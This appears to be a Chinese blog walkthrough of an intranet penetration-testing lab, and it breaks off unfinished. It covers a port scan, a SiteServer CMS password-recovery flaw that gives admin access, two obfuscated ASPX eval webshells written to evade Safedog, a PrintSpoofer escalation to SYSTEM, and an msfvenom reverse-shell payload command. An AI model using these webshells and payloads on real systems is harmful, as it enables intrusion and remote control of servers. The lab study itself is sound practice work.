0%

暗月内网靶机WP

环境搭建

web服务器

192.168.0.114 (本地使用nat)

10.10.131(Vm18) 开启防火墙 安全狗 和windows自带杀软

OA系统

10.10.1.130(VM18)

10.10.10.166(VM19)开启防火墙 360全家桶

域控dc

10.10.10.165(VM19) 无防护软件


3台机器密码

win2016-web !@#QWE123

win2016-dc !@#QWE123.

win2012 oa !@#Q123


目的 :获取域控中的flag.txt内容


先修改host文件 绑定ip和域名 192.168.0.144 www.moonlab.com

信息收集

nmap扫一下端口

sudo nmap -sV -p- 192.168.0.114 开放了21 90 999 3389 5985 6588端口

kali@kali2020:~$ sudo nmap -sV -p- 192.168.0.114 [sudo] kali 的密码: Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-16 10:55 CST Nmap scan report for www.moonlab.com (192.168.0.114) Host is up (0.00040s latency). Not shown: 65529 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 80/tcp open http Microsoft IIS httpd 10.0 999/tcp open http Microsoft IIS httpd 10.0 3389/tcp open ms-wbt-server Microsoft Terminal Services 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 6588/tcp open http Microsoft IIS httpd 10.0 MAC Address: 00:0C:29:36:38:42 (VMware) Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 123.13 seconds

看下robots.txt

User-agent: * Disallow: /SiteServer/ Disallow: /SiteFiles/ Disallow: /UserCenter/

访问http://www.moonlab.com/siteserver看到一个管理员登陆页面,使用的是siteserver cms

系统版本:3.6.4 .NET 版本:2.0 数据库:SqlServer

漏洞利用

去网上查一下有没有相关漏洞。

发现SiteServer cms存在管理员密码找回漏洞,只需要关闭js 然后输入admin 点击下一步即可得到管理员密码

得到密码为 admin5566 成功登录到后台

上传webshell

考虑直接在站点文件管理处 上传一个aspx的一句话,但是被安全狗拦截了

看到有.aspx的文件 直接进行编辑修改,然后尝试连接一句话,密码为 1 ,成功使用蚁剑连接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<%@ Page Language="Jscript" Debug=true%>
<%
var SE=Request.Form["1"];
var SMQ="unsa",FWJVPDC="fe",PZEGHR=SMQ+FWJVPDC;
function AJHB()
{
return SE;
}
function NCBRJ()
{
eval(AJHB(),PZEGHR);
}
NCBRJ()
%>


也可以在模块管理处上传,在网上找了个aspx一句话免杀,密码为M

1
2
3
<%@ Page Language="Jscript"%>
<% var p = Request.Item["M"]; var a = p.substring(0,1); var b = p.substring(1,99999); var c = "un" + Char ( 115 ) + Char ( 97 ) + "fe"; eval(a+b,c);
%>

通过站点文件管理 可以找到一句话上传的路径 为 根目录\1 


使用蚁剑连接

whoami 显示为 iis apppool\moonlab

systeminfo 查看值打了两个补丁

tasklist /svc 查看系统进程,查看存在什么杀软,可以看到存在安全狗

netstat -ano 查看本机开放端口

net start 查看已经启动的windows服务

Safedog Guard Center Safedog Update Center SafeDogCloudHelper


利用PrintSpoofer 提权

将 PrintSpoofer.exe 上传到 windows/Temp 中

PrintSpoofer64.exe -h 查看帮助

![PrintSpoofer1.PNG]

PrintSpoofer64.exe -i -c "whoami"

成功执行 system权限



后续还未完成.....

msf生成payload


msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.128 LPORT=2333 -e x86/shikata_ga_nai -i 20 -f csharp -o 1.txt

欢迎关注我的其它发布渠道

------------- 💖 🌞 本 文 结 束 😚 感 谢 您 的 阅 读 🌞 💖 -------------